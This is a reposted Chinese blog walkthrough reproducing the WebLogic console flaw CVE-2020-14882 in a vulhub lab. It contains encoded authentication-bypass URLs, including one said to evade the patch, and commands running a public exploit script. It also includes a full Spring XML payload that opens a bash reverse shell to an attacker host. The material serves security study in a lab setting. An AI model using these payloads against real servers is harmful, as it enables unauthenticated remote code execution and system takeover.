CVE-2020-14882【vulhub weblogic漏洞复现】

admin 2024年10月21日23:39:50评论36 views字数 1661阅读5分32秒阅读模式

 漏洞描述  : 

    2020年10月28日,Oracle发布的10月安全更新中的Oracle WebLogic Server 远程代码执行漏洞(CVE-2020-14882)POC被公开,远程攻击者可以通过发送恶意的HTTP GET 请求。成功利用此漏洞的攻击者可在未经身份验证的情况下控制 WebLogic Server Console ,并执行任意代码。

环境搭建  

进入相关环境CVE-2020-14882【vulhub weblogic漏洞复现】

启动容器  

docker-compose up -d            //启动环境            
docker-compose ps -a            //查看状态            

             CVE-2020-14882【vulhub weblogic漏洞复现】

             CVE-2020-14882【vulhub weblogic漏洞复现】

浏览访问   

ip+分配的端口(7001)

以下页面正常

           CVE-2020-14882【vulhub weblogic漏洞复现】

拼接poc,再访问  

poc:/console/login/LoginForm.jsp

账号密码别管,应该是我的浏览器缓存

             CVE-2020-14882【vulhub weblogic漏洞复现】

未授权访问后台  

权限漏洞绕过,主要的POC如下:

/console/images/%252E%252E%252Fconsole.portal            
/console/css/%25%32%65%25%32%65%25%32%66console.portal            
           
大写换成小写可绕过补丁:           
/console/css/%252e%252e%252fconsole.portal            

             CVE-2020-14882【vulhub weblogic漏洞复现】

漏洞利用 命令执行  

直接上脚本:https://github.com/backlion/CVE-2020-14882_ALL

脚本解压,进入解压后的目录cmd

(我这里的python环境是3,你们可以试一下其它的,因为不知道有没有影响,所以写一下)

python CVE-2020-14882_ALL.py -u http://192.168.10.30:7001 -c "ls"            

CVE-2020-14882【vulhub weblogic漏洞复现】

无回显的利用  

外置xml文件无回显命令执行

复制以下内容,修改反弹shell的ip与端口。保存为poc.xml

<beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">

  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

    <constructor-arg>

      <list>

        <value>/bin/bash</value>

        <value>-c</value>

        <value><![CDATA[bash -i >& /dev/tcp/192.168.10.55/4444  0>&1]]></value>

      </list>

    </constructor-arg>

  </bean>

</beans>

开启kali临时开启一个http服务  

把编辑好的poc.xml文件保存到kali里,在当前目录开启临时http服务 指定8888端口

CVE-2020-14882【vulhub weblogic漏洞复现】

访问http服务,可以看见编辑好的文件

CVE-2020-14882【vulhub weblogic漏洞复现】

kali开启监听端口  

(监听端口对应poc.xml文件中反弹shell的端口)

CVE-2020-14882【vulhub weblogic漏洞复现】

主机运行脚本   

python3 CVE-2020-14882_ALL.py -u http://靶机ip:7001/  -x  http://kaliIP:8888/poc.xml

CVE-2020-14882【vulhub weblogic漏洞复现】

kali反弹shell             

CVE-2020-14882【vulhub weblogic漏洞复现】

参考文章  

https://www.cnblogs.com/backlion/p/13951858.html

原文始发于微信公众号(小白摸坑学网安):CVE-2020-14882【vulhub weblogic漏洞复现】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日23:39:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2020-14882【vulhub weblogic漏洞复现】https://cn-sec.com/archives/2493083.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息